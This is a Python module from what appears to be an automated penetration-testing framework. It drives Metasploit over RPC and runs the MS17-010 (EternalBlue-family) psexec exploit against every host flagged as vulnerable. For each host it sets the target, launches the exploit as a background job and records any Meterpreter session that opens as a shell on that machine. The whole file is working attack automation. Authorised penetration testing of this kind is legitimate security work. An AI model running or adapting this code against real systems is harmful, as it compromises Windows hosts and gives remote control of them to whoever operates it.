import re

from core.actionModule import actionModule
from core.keystore import KeyStore as kb
from core.mymsf import myMsf
from core.utils import Utils


class exploit_msf_ms17_010(actionModule):
    def __init__(self, config, display, lock):
        super(exploit_msf_ms17_010, self).__init__(config, display, lock)
        self.title = "Attempt to exploit MS17-010"
        self.shortName = "MSFms17-010"
        self.description = "execute [exploit/windows/smb/ms17_010_psexec] on each target"

        self.requirements = ["msfconsole"]
        self.triggers = ["ms17-010"]
        self.types = ["exploit"]
        
        self.safeLevel = 4

    def getTargets(self):
        # we are interested only in the hosts that had nullsessions
        self.targets = kb.get('vuln/host/*/ms17-010')

    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'],
                        password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # loop over each target
            for t in self.targets:
                # verify we have not tested this host before
                if not self.seentarget(t):
                    # add the new IP to the already seen list
                    self.addseentarget(t)
                    myMsf.lock.acquire()
                    self.display.verbose(self.shortName + " - Connecting to " + t)
                    msf.execute("use exploit/windows/smb/ms17_010_psexec\n")
                    msf.execute("set TARGET 0\n")
                    msf.execute("set RHOST " + t + "\n")
                    msf.execute("exploit -j\n")
                    msf.sleep(int(self.config['msfexploitdelay']))

                    outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
                    result = msf.getResult()
                    myMsf.lock.release()
                    Utils.writeFile(result, outfile)
                    kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))

                    parts = re.findall(".*Meterpreter session (\d+) opened.*", result)
                    for part in parts:
                        self.fire("msfSession")
                        self.display.verbose("NEW session on : " + t)
                        kb.add("shell/" + t + "/msf/" + str(part))

            # clean up after ourselves
            result = msf.cleanup()

        return
